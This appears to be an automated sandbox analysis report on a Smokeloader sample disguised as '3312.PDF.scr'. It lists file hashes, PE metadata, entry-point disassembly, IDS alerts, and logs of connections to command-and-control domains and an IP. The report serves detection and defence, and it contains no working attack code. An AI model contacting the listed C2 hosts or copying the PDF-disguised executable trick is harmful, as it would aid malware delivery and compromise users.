                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="524079" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):108216
                                                                                  Entropy (8bit):4.005468489715424
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:b7F9oInjxkCGHzOPqjk0+ACWHpfnzbNyLYduJxP7pxoZsR1v9nvnFOOmdypfR3Y8:hdkDzDrJvzgxhGiwGGnS5mFwiKui5l+a
                                                                                  MD5:C9D3D880E24446CF243CD0C50AE2C72C
                                                                                  SHA1:BBBFA2BA4D2312646EE8FB30D4534717D8CC4E7A
                                                                                  SHA-256:EDFFDAAA2A7892545A927806E9C7CFD8E5B05C6A1A4097BBE5A42811FFC423DC
                                                                                  SHA-512:4E31539CF5FB254E2EDE3C4DBCDC103A1AE4510992AFB4F9A0666DC078289CDFEF91346218A860D50124C7C5F2696ABA689AF2BB51FCE72DBA1510504429EFEB
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:....h... .......p.......P...........p...Y......^...................P...W.......e.n.-.C.H.;.e.n.-.G.B...............8..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):108216
                                                                                  Entropy (8bit):4.006765961093096
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:ZHF9oEnjxkIG1zOPqjk0+ACWHpfnzbNYLYduJxP7pxoZsR1v95ZNFOOmdypfR3YY:3dk7zDrJvzsvhGiwGGns/mFIiK2ibl+a
                                                                                  MD5:3F721CE7766342DB167895A3F2917A10
                                                                                  SHA1:9830B84EE2B59A64ED6CDBF58E14092178E42FFE
                                                                                  SHA-256:077AB0AD092ECBADFC16A375C76FAF67525C04B14BB63B4FF5B01FEDF4E865D3
                                                                                  SHA-512:F94056BDE31301EC88D468D105C0BC18CFEC93D80E4CA215AE7FE6E86C6210C0955F70A183F1FAB926E5C2DBE9CAF1B7B2F5C1C4777A1BB9E0B1EA9A7C785C15
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:....h... .......p.......P...........p...Y......^...................P...W.......e.n.-.C.H.;.e.n.-.G.B...............8..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):750
                                                                                  Entropy (8bit):5.151163593527057
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:YWgc2XZVDUH+BVDMmwPcH+2yrZMAdrKC8K/y8kEhq1HLxycXNNZ/TCB893c3Z:Yzc2JVDUHIVDokHt0drc6hE14
                                                                                  MD5:80A3E52E937A0557FE54ECACDF3A9209
                                                                                  SHA1:5E2569802D38E238D8BB296ED8358B982E5FF933
                                                                                  SHA-256:6495C7482E99CAE11ECB964D5585F48DE573FCD974B7D7AB2DECA44A87688F55
                                                                                  SHA-512:0597B07BD50A48C3ED041ABB6A05BE761896E012020AD250183E11A3109AB62B1A0CB488A4E31567F4936406BEBED9A211D0DCCA777E3E3681E81A4AA4791404
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:{"serviceContext":{"serviceActivityId":"28279061-328c-472f-9d91-0bec632b1214","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"28279061-328c-472f-9d91-0bec632b1214|2024-10-01T07:36:26.5242200Z|fabric_msn|EUS2-A|News_863"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false},"isPartial":false}
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):219648
                                                                                  Entropy (8bit):6.518601542855416
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:SaLB7RwDvY4WMouj3QF7b5qlY8ZeyrgoidA33nMs3j42:SaLlRwDvHNxTZeypbXXT
                                                                                  MD5:4E30F8FA403546790A16A9B0E0C72F02
                                                                                  SHA1:A22F898920194C5E191ABFD535FA79EE387FBD8B
                                                                                  SHA-256:C62D2FD76A5742A08DB7157AD38B2F0209A11E8E9CC698902DBF366913FAE535
                                                                                  SHA-512:A185E55C43D91395460BED714DE3832AABCE18227148C6B23A1E35388D6172C19C7AA7769999D04BF81D38BE62BAFB46DAC2E641C8AFC4679EF051AE94CDC015
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:low
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........IE...E...E...[...Y...[...V...[.......bu..B...E...7...[...D...[...D...[...D...RichE...........................PE..L.....Zd.................|...\....................@.............................................................................P....P...............................................................................................................text....{.......|.................. ..`.rdata... ......."..................@..@.data...............................@....tls.........@......................@....rsrc........P......................@..@........................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):26
                                                                                  Entropy (8bit):3.95006375643621
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                  Malicious:true
                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):6.518601542855416
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:3312.PDF.scr
                                                                                  File size:219'648 bytes
                                                                                  MD5:4e30f8fa403546790a16a9b0e0c72f02
                                                                                  SHA1:a22f898920194c5e191abfd535fa79ee387fbd8b
                                                                                  SHA256:c62d2fd76a5742a08db7157ad38b2f0209a11e8e9cc698902dbf366913fae535
                                                                                  SHA512:a185e55c43d91395460bed714de3832aabce18227148c6b23a1e35388d6172c19c7aa7769999d04bf81d38be62bafb46dac2e641c8afc4679ef051ae94cdc015
                                                                                  SSDEEP:3072:SaLB7RwDvY4WMouj3QF7b5qlY8ZeyrgoidA33nMs3j42:SaLlRwDvHNxTZeypbXXT
                                                                                  TLSH:B3246B1176E092A6EFF347316975FB941ABBBCFA6A30508E2240321F2E773D14966707
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........IE...E...E...[...Y...[...V...[.......bu..B...E...7...[...D...[...D...[...D...RichE...........................PE..L.....Zd...
                                                                                  Icon Hash:0b310a1a12646513
                                                                                  Entrypoint:0x401716
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x645AEF8C [Wed May 10 01:12:44 2023 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:0
                                                                                  File Version Major:5
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:abd58e636146ae1edca4aa616a47bb50
                                                                                  Instruction
                                                                                  call 00007FF398DE699Ch
                                                                                  jmp 00007FF398DE2ABEh
                                                                                  mov edi, edi
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  sub esp, 00000328h
                                                                                  mov dword ptr [0041D888h], eax
                                                                                  mov dword ptr [0041D884h], ecx
                                                                                  mov dword ptr [0041D880h], edx
                                                                                  mov dword ptr [0041D87Ch], ebx
                                                                                  mov dword ptr [0041D878h], esi
                                                                                  mov dword ptr [0041D874h], edi
                                                                                  mov word ptr [0041D8A0h], ss
                                                                                  mov word ptr [0041D894h], cs
                                                                                  mov word ptr [0041D870h], ds
                                                                                  mov word ptr [0041D86Ch], es
                                                                                  mov word ptr [0041D868h], fs
                                                                                  mov word ptr [0041D864h], gs
                                                                                  pushfd
                                                                                  pop dword ptr [0041D898h]
                                                                                  mov eax, dword ptr [ebp+00h]
                                                                                  mov dword ptr [0041D88Ch], eax
                                                                                  mov eax, dword ptr [ebp+04h]
                                                                                  mov dword ptr [0041D890h], eax
                                                                                  lea eax, dword ptr [ebp+08h]
                                                                                  mov dword ptr [0041D89Ch], eax
                                                                                  mov eax, dword ptr [ebp-00000320h]
                                                                                  mov dword ptr [0041D7D8h], 00010001h
                                                                                  mov eax, dword ptr [0041D890h]
                                                                                  mov dword ptr [0041D78Ch], eax
                                                                                  mov dword ptr [0041D780h], C0000409h
                                                                                  mov dword ptr [0041D784h], 00000001h
                                                                                  mov eax, dword ptr [0041C008h]
                                                                                  mov dword ptr [ebp-00000328h], eax
                                                                                  mov eax, dword ptr [0041C00Ch]
                                                                                  mov dword ptr [ebp-00000324h], eax
                                                                                  call dword ptr [000000D8h]
                                                                                  Programming Language:
                                                                                  • [C++] VS2008 build 21022
                                                                                  • [ASM] VS2008 build 21022
                                                                                  • [ C ] VS2008 build 21022
                                                                                  • [IMP] VS2005 build 50727
                                                                                  • [RES] VS2008 build 21022
                                                                                  • [LNK] VS2008 build 21022
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1a7840x50.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1150000x199a0.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x1a4900x18.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x190000x18c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x17b7f0x17c004e219e47d75907af82feccf982c4e1c5False0.7901726973684211data7.486122419985256IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x190000x20a40x22008a075bd557d8724065fd4003a8212a3eFalse0.36580882352941174data5.504082787533202IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0x1c0000xf7ff80x18004405d7de33fab4bc1cee794a960e08d4False0.2591145833333333data2.672636859110211IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .tls0x1140000x51d0x60053e979547d8c2ea86560ac45de08ae25False0.013020833333333334data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0x1150000x199a00x19a0080a2deeeec59981320d358ee31e0e096False0.501733993902439data5.496159187462656IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  AFX_DIALOG_LAYOUT0x1278880x2data5.0
                                                                                  SELEWAVOLOVIDABIBAFILU0x126c900xbf7ASCII text, with very long lines (3063), with no line terminatorsTurkishTurkey0.6033300685602351
                                                                                  RT_CURSOR0x1278900x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                                  RT_CURSOR0x1279c00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                                  RT_ICON0x1159a00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5748933901918977
                                                                                  RT_ICON0x1168480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6462093862815884
                                                                                  RT_ICON0x1170f00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.701036866359447
                                                                                  RT_ICON0x1177b80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7521676300578035
                                                                                  RT_ICON0x117d200x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5238589211618258
                                                                                  RT_ICON0x11a2c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.6301594746716698
                                                                                  RT_ICON0x11b3700x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.644672131147541
                                                                                  RT_ICON0x11bcf80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7783687943262412
                                                                                  RT_ICON0x11c1d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39685501066098083
                                                                                  RT_ICON0x11d0800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5595667870036101
                                                                                  RT_ICON0x11d9280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6261520737327189
                                                                                  RT_ICON0x11dff00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6372832369942196
                                                                                  RT_ICON0x11e5580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.44394934333958724
                                                                                  RT_ICON0x11f6000x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.43565573770491806
                                                                                  RT_ICON0x11ff880x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.48315602836879434
                                                                                  RT_ICON0x1204580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5882196162046909
                                                                                  RT_ICON0x1213000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6227436823104693
                                                                                  RT_ICON0x121ba80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.527073732718894
                                                                                  RT_ICON0x1222700x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.5982658959537572
                                                                                  RT_ICON0x1227d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5825726141078839
                                                                                  RT_ICON0x124d800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.6456378986866792
                                                                                  RT_ICON0x125e280x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6557377049180327
                                                                                  RT_ICON0x1267b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7189716312056738
                                                                                  RT_STRING0x12a1380x44edata0.4500907441016334
                                                                                  RT_STRING0x12a5880x6f0data0.43074324324324326
                                                                                  RT_STRING0x12ac780x5ecdata0.44327176781002636
                                                                                  RT_STRING0x12b2680x50edata0.4474497681607419
                                                                                  RT_STRING0x12b7780x694data0.4245843230403801
                                                                                  RT_STRING0x12be100x4e6data0.45614035087719296
                                                                                  RT_STRING0x12c2f80x5aedata0.4449793672627235
                                                                                  RT_STRING0x12c8a80x5ccdata0.4474393530997305
                                                                                  RT_STRING0x12ce780x72cdata0.4297385620915033
                                                                                  RT_STRING0x12d5a80x6eedata0.4222096956031567
                                                                                  RT_STRING0x12dc980x81edata0.41915303176130897
                                                                                  RT_STRING0x12e4b80x448data0.458029197080292
                                                                                  RT_STRING0x12e9000x9adata0.5974025974025974
                                                                                  RT_GROUP_CURSOR0x129f680x22data1.088235294117647
                                                                                  RT_GROUP_ICON0x126c180x76dataTurkishTurkey0.6694915254237288
                                                                                  RT_GROUP_ICON0x11c1600x76dataTurkishTurkey0.6610169491525424
                                                                                  RT_GROUP_ICON0x1203f00x68dataTurkishTurkey0.7115384615384616
                                                                                  RT_VERSION0x129f900x1a8data0.5825471698113207
                                                                                  DLLImport
                                                                                  KERNEL32.dllGetConsoleAliasesLengthW, CopyFileExW, GetNumaProcessorNode, OpenJobObjectA, ReadConsoleA, QueryDosDeviceA, GetEnvironmentStringsW, WaitForSingleObject, InterlockedCompareExchange, GetComputerNameW, GetNumaAvailableMemoryNode, BackupSeek, FreeEnvironmentStringsA, GetModuleHandleW, GetCommandLineA, GlobalAlloc, GetVolumeInformationA, GetConsoleMode, GetConsoleAliasExesLengthW, GetSystemTimeAdjustment, WriteConsoleOutputA, GetFileAttributesA, HeapCreate, GetBinaryTypeA, SetPriorityClass, GetStdHandle, GetLastError, GetProcAddress, MoveFileW, SearchPathA, LoadLibraryA, LocalAlloc, SetCalendarInfoW, SetCommMask, FindAtomA, CreatePipe, GetDefaultCommConfigA, GetModuleHandleA, BuildCommDCBA, PurgeComm, FatalAppExitA, WriteConsoleOutputAttribute, GetModuleFileNameW, SearchPathW, HeapFree, Sleep, ExitProcess, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapAlloc, VirtualAlloc, HeapReAlloc, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, GetModuleFileNameA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize
                                                                                  USER32.dllGetUserObjectInformationW, SetFocus
                                                                                  ADVAPI32.dllObjectPrivilegeAuditAlarmW
                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  TurkishTurkey
                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-10-01T09:35:10.765857+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44973645.143.201.1480TCP
                                                                                  2024-10-01T09:36:16.864957+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44973845.143.201.1480TCP
                                                                                  2024-10-01T09:36:17.927460+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44973945.143.201.1480TCP
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 1, 2024 09:35:09.532390118 CEST4973680192.168.2.445.143.201.14
                                                                                  Oct 1, 2024 09:35:09.538450003 CEST804973645.143.201.14192.168.2.4
                                                                                  Oct 1, 2024 09:35:09.538595915 CEST4973680192.168.2.445.143.201.14
                                                                                  Oct 1, 2024 09:35:09.538768053 CEST4973680192.168.2.445.143.201.14
                                                                                  Oct 1, 2024 09:35:09.538780928 CEST4973680192.168.2.445.143.201.14
                                                                                  Oct 1, 2024 09:35:09.543766022 CEST804973645.143.201.14192.168.2.4
                                                                                  Oct 1, 2024 09:35:09.543872118 CEST804973645.143.201.14192.168.2.4
                                                                                  Oct 1, 2024 09:35:10.765750885 CEST804973645.143.201.14192.168.2.4
                                                                                  Oct 1, 2024 09:35:10.765795946 CEST804973645.143.201.14192.168.2.4
                                                                                  Oct 1, 2024 09:35:10.765856981 CEST4973680192.168.2.445.143.201.14
                                                                                  Oct 1, 2024 09:35:40.370755911 CEST804973645.143.201.14192.168.2.4
                                                                                  Oct 1, 2024 09:35:40.370873928 CEST4973680192.168.2.445.143.201.14
                                                                                  Oct 1, 2024 09:35:40.377882004 CEST4973680192.168.2.445.143.201.14
                                                                                  Oct 1, 2024 09:35:40.383064032 CEST804973645.143.201.14192.168.2.4
                                                                                  Oct 1, 2024 09:36:15.989099026 CEST4973880192.168.2.445.143.201.14
                                                                                  Oct 1, 2024 09:36:15.994004011 CEST804973845.143.201.14192.168.2.4
                                                                                  Oct 1, 2024 09:36:15.994107962 CEST4973880192.168.2.445.143.201.14
                                                                                  Oct 1, 2024 09:36:15.994292974 CEST4973880192.168.2.445.143.201.14
                                                                                  Oct 1, 2024 09:36:15.994332075 CEST4973880192.168.2.445.143.201.14
                                                                                  Oct 1, 2024 09:36:15.999260902 CEST804973845.143.201.14192.168.2.4
                                                                                  Oct 1, 2024 09:36:15.999272108 CEST804973845.143.201.14192.168.2.4
                                                                                  Oct 1, 2024 09:36:16.813863993 CEST804973845.143.201.14192.168.2.4
                                                                                  Oct 1, 2024 09:36:16.864957094 CEST4973880192.168.2.445.143.201.14
                                                                                  Oct 1, 2024 09:36:16.969856024 CEST4973880192.168.2.445.143.201.14
                                                                                  Oct 1, 2024 09:36:16.970535040 CEST4973980192.168.2.445.143.201.14
                                                                                  Oct 1, 2024 09:36:16.975081921 CEST804973845.143.201.14192.168.2.4
                                                                                  Oct 1, 2024 09:36:16.975156069 CEST4973880192.168.2.445.143.201.14
                                                                                  Oct 1, 2024 09:36:16.975323915 CEST804973945.143.201.14192.168.2.4
                                                                                  Oct 1, 2024 09:36:16.975547075 CEST4973980192.168.2.445.143.201.14
                                                                                  Oct 1, 2024 09:36:16.975697994 CEST4973980192.168.2.445.143.201.14
                                                                                  Oct 1, 2024 09:36:16.976521015 CEST4973980192.168.2.445.143.201.14
                                                                                  Oct 1, 2024 09:36:16.980478048 CEST804973945.143.201.14192.168.2.4
                                                                                  Oct 1, 2024 09:36:16.981245041 CEST804973945.143.201.14192.168.2.4
                                                                                  Oct 1, 2024 09:36:17.877274036 CEST804973945.143.201.14192.168.2.4
                                                                                  Oct 1, 2024 09:36:17.927459955 CEST4973980192.168.2.445.143.201.14
                                                                                  Oct 1, 2024 09:36:21.932812929 CEST4973980192.168.2.445.143.201.14
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 1, 2024 09:35:08.733119011 CEST5655753192.168.2.41.1.1.1
                                                                                  Oct 1, 2024 09:35:09.530452013 CEST53565571.1.1.1192.168.2.4
                                                                                  Oct 1, 2024 09:35:10.813580990 CEST6004353192.168.2.41.1.1.1
                                                                                  Oct 1, 2024 09:35:10.824325085 CEST53600431.1.1.1192.168.2.4
                                                                                  Oct 1, 2024 09:35:10.921781063 CEST6057653192.168.2.41.1.1.1
                                                                                  Oct 1, 2024 09:35:11.078289986 CEST53605761.1.1.1192.168.2.4
                                                                                  Oct 1, 2024 09:35:11.081444979 CEST6514953192.168.2.41.1.1.1
                                                                                  Oct 1, 2024 09:35:11.231877089 CEST53651491.1.1.1192.168.2.4
                                                                                  Oct 1, 2024 09:36:16.817858934 CEST5035553192.168.2.41.1.1.1
                                                                                  Oct 1, 2024 09:36:16.827888012 CEST53503551.1.1.1192.168.2.4
                                                                                  Oct 1, 2024 09:36:16.830265045 CEST5147453192.168.2.41.1.1.1
                                                                                  Oct 1, 2024 09:36:16.878025055 CEST53514741.1.1.1192.168.2.4
                                                                                  Oct 1, 2024 09:36:16.886065960 CEST5761953192.168.2.41.1.1.1
                                                                                  Oct 1, 2024 09:36:16.933482885 CEST53576191.1.1.1192.168.2.4
                                                                                  Oct 1, 2024 09:36:25.564203024 CEST5971053192.168.2.41.1.1.1
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Oct 1, 2024 09:35:08.733119011 CEST192.168.2.41.1.1.10xff8dStandard query (0)unicexpertmagazine.pwA (IP address)IN (0x0001)false
                                                                                  Oct 1, 2024 09:35:10.813580990 CEST192.168.2.41.1.1.10x298bStandard query (0)ceoconstractionstore.plA (IP address)IN (0x0001)false
                                                                                  Oct 1, 2024 09:35:10.921781063 CEST192.168.2.41.1.1.10xae8bStandard query (0)openclehardware.ruA (IP address)IN (0x0001)false
                                                                                  Oct 1, 2024 09:35:11.081444979 CEST192.168.2.41.1.1.10x9754Standard query (0)informcoopirationunicolceo.ruA (IP address)IN (0x0001)false
                                                                                  Oct 1, 2024 09:36:16.817858934 CEST192.168.2.41.1.1.10x8e5Standard query (0)ceoconstractionstore.plA (IP address)IN (0x0001)false
                                                                                  Oct 1, 2024 09:36:16.830265045 CEST192.168.2.41.1.1.10xfea2Standard query (0)openclehardware.ruA (IP address)IN (0x0001)false
                                                                                  Oct 1, 2024 09:36:16.886065960 CEST192.168.2.41.1.1.10xbc17Standard query (0)informcoopirationunicolceo.ruA (IP address)IN (0x0001)false
                                                                                  Oct 1, 2024 09:36:25.564203024 CEST192.168.2.41.1.1.10x8f9Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Oct 1, 2024 09:35:09.530452013 CEST1.1.1.1192.168.2.40xff8dNo error (0)unicexpertmagazine.pw45.143.201.14A (IP address)IN (0x0001)false
                                                                                  Oct 1, 2024 09:35:10.824325085 CEST1.1.1.1192.168.2.40x298bName error (3)ceoconstractionstore.plnonenoneA (IP address)IN (0x0001)false
                                                                                  Oct 1, 2024 09:35:11.078289986 CEST1.1.1.1192.168.2.40xae8bName error (3)openclehardware.runonenoneA (IP address)IN (0x0001)false
                                                                                  Oct 1, 2024 09:35:11.231877089 CEST1.1.1.1192.168.2.40x9754Name error (3)informcoopirationunicolceo.runonenoneA (IP address)IN (0x0001)false
                                                                                  Oct 1, 2024 09:36:16.827888012 CEST1.1.1.1192.168.2.40x8e5Name error (3)ceoconstractionstore.plnonenoneA (IP address)IN (0x0001)false
                                                                                  Oct 1, 2024 09:36:16.878025055 CEST1.1.1.1192.168.2.40xfea2Name error (3)openclehardware.runonenoneA (IP address)IN (0x0001)false
                                                                                  Oct 1, 2024 09:36:16.933482885 CEST1.1.1.1192.168.2.40xbc17Name error (3)informcoopirationunicolceo.runonenoneA (IP address)IN (0x0001)false
                                                                                  Oct 1, 2024 09:36:25.570992947 CEST1.1.1.1192.168.2.40x8f9No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                  • mvrswdonrbcmf.org
                                                                                    • unicexpertmagazine.pw
